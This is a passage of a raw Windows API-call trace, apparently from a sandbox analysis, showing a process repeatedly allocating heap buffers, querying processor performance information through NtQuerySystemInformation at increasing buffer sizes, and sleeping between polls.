hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0305.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0305.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0305.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.968] Sleep (dwMilliseconds=0x110) [0305.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0305.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0305.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0305.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0305.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0305.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0305.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.989] Sleep (dwMilliseconds=0x110) [0306.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0306.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0306.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0306.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0306.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0306.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0306.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0306.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0306.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.008] Sleep (dwMilliseconds=0x110) [0306.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0306.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0306.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0306.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0306.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0306.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0306.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.017] Sleep (dwMilliseconds=0x110) [0306.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0306.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0306.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0306.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0306.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0306.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0306.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.037] Sleep (dwMilliseconds=0x110) [0306.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0306.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0306.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0306.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0306.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0306.087] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0306.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.089] Sleep (dwMilliseconds=0x110) [0306.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0306.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0306.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0306.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0306.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0306.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0306.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.099] Sleep (dwMilliseconds=0x110) [0306.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0306.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0306.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0306.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0306.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0306.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0306.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.113] Sleep (dwMilliseconds=0x110) [0306.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0306.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0306.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0306.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0306.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0306.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0306.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0306.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0306.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.130] Sleep (dwMilliseconds=0x110) [0306.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0306.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0306.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0306.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0306.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0306.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0306.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0306.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0306.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.145] Sleep (dwMilliseconds=0x110) [0306.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0306.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0306.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0306.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0306.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0306.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0306.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0306.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0306.161] Sleep (dwMilliseconds=0x110) [0306.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0306.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0306.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0306.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0306.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0306.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0306.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0306.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0306.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e2510 [0306.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e2510 | out: hHeap=0x2560000) returned 1 [0306.207] Sleep (dwMilliseconds=0x110) [0306.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0306.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0306.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0306.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0306.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0306.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0306.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0306.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0306.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.222] Sleep (dwMilliseconds=0x110) [0306.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0306.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0306.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0306.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0306.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0306.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0306.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0306.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0306.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.238] Sleep (dwMilliseconds=0x110) [0306.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0306.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0306.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 